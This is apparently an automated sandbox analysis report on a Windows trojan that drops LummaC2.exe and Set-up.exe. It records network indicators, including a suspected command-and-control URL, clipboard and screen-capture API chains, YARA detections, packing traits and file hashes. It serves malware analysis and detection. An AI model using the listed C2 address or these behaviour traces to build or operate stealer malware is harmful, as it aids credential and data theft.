Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:53:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657808349.0000000000F99000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100034fd4
Source: Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963
Source: Set-up.exe, Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=00ll
Source: Set-up.exe, 00000003.00000002.1657808349.0000000000F99000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000003.1477544616.0000000000987000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1477505185.0000000000985000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00481B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00481B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00481B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00481B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00481D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00481D10

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Cph7VEeu1r.exe.8e0000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: Cph7VEeu1r.exe	Static PE information: section name:
Source: Cph7VEeu1r.exe	Static PE information: section name: .idata
Source: Cph7VEeu1r.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00485135	2_2_00485135
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00458720	2_2_00458720
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046D840	2_2_0046D840
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046A800	2_2_0046A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048A800	2_2_0048A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048B813	2_2_0048B813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00469820	2_2_00469820
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048483C	2_2_0048483C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046683F	2_2_0046683F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004720C0	2_2_004720C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004880C5	2_2_004880C5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048A0D0	2_2_0048A0D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004730E0	2_2_004730E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004770F9	2_2_004770F9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00468095	2_2_00468095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047C894	2_2_0047C894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004868A0	2_2_004868A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048D140	2_2_0048D140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0045B14F	2_2_0045B14F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00453960	2_2_00453960
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00455970	2_2_00455970
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0045C97C	2_2_0045C97C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004561D0	2_2_004561D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047C9DA	2_2_0047C9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047C9E9	2_2_0047C9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048E1F0	2_2_0048E1F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047C984	2_2_0047C984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004759B0	2_2_004759B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00477A40	2_2_00477A40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048D240	2_2_0048D240
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00464A50	2_2_00464A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046C205	2_2_0046C205
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046720B	2_2_0046720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00458A20	2_2_00458A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046E230	2_2_0046E230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00476230	2_2_00476230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046AAE0	2_2_0046AAE0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047C289	2_2_0047C289
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00461A94	2_2_00461A94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00459290	2_2_00459290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0045F2A0	2_2_0045F2A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0045D35C	2_2_0045D35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00467B75	2_2_00467B75
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00454310	2_2_00454310
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00481B10	2_2_00481B10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0045AB20	2_2_0045AB20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048D320	2_2_0048D320
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00486BF0	2_2_00486BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047A3B0	2_2_0047A3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048D3B0	2_2_0048D3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048DBB0	2_2_0048DBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00478C46	2_2_00478C46
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00457440	2_2_00457440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00454C50	2_2_00454C50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046DC50	2_2_0046DC50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048D450	2_2_0048D450
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0045E465	2_2_0045E465
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00473C60	2_2_00473C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004664E0	2_2_004664E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004874F0	2_2_004874F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048E540	2_2_0048E540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00471550	2_2_00471550
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046D560	2_2_0046D560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00471D10	2_2_00471D10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048A510	2_2_0048A510
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00477D94	2_2_00477D94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00465640	2_2_00465640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00475640	2_2_00475640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00456660	2_2_00456660
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00469605	2_2_00469605
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00455E30	2_2_00455E30
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004766C0	2_2_004766C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047FEC0	2_2_0047FEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_004726D3	2_2_004726D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00487EA0	2_2_00487EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048DEB0	2_2_0048DEB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047BF45	2_2_0047BF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00452F40	2_2_00452F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00460F71	2_2_00460F71
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046F700	2_2_0046F700
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00459710	2_2_00459710
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0047DFC3	2_2_0047DFC3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0046DFC0	2_2_0046DFC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00473FF1	2_2_00473FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00485FF0	2_2_00485FF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00487790	2_2_00487790

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\LummaC2.exe C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Set-up.exe 73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 00464A40 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 00457FF0 appears 45 times

Source: Cph7VEeu1r.exe, 00000000.00000002.1478742862.0000000000FB6000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs Cph7VEeu1r.exe
Source: Cph7VEeu1r.exe, 00000000.00000002.1481242140.0000000005760000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs Cph7VEeu1r.exe
Source: Cph7VEeu1r.exe	Binary or memory string: OriginalFilenameladddad.exe4 vs Cph7VEeu1r.exe

Source: Cph7VEeu1r.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Cph7VEeu1r.exe.8e0000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: Cph7VEeu1r.exe

Static PE information: Section: awwpolhe ZLIB complexity 0.9945430658505541

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/3@8/2

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_0047D110 CoCreateInstance,

2_2_0047D110

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cph7VEeu1r.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Cph7VEeu1r.exe

ReversingLabs: Detection: 57%

Source: Cph7VEeu1r.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: Cph7VEeu1r.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\Cph7VEeu1r.exe "C:\Users\user\Desktop\Cph7VEeu1r.exe"
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Cph7VEeu1r.exe

Static file information: File size 6175232 > 1048576

Source: Cph7VEeu1r.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x43d600
Source: Cph7VEeu1r.exe	Static PE information: Raw size of awwpolhe is bigger than: 0x100000 < 0x1a1600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Unpacked PE file: 0.2.Cph7VEeu1r.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awwpolhe:EW;xoofptqc:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: Cph7VEeu1r.exe	Static PE information: real checksum: 0x5eb52c should be: 0x5ecbea
Source: LummaC2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4fec3

Source: Cph7VEeu1r.exe	Static PE information: section name:
Source: Cph7VEeu1r.exe	Static PE information: section name: .idata
Source: Cph7VEeu1r.exe	Static PE information: section name:
Source: Cph7VEeu1r.exe	Static PE information: section name: awwpolhe
Source: Cph7VEeu1r.exe	Static PE information: section name: xoofptqc
Source: Cph7VEeu1r.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048D0F0 push eax; mov dword ptr [esp], 03020130h	2_2_0048D0F1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_0048A480 push eax; mov dword ptr [esp], C9D6D7D4h	2_2_0048A48E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
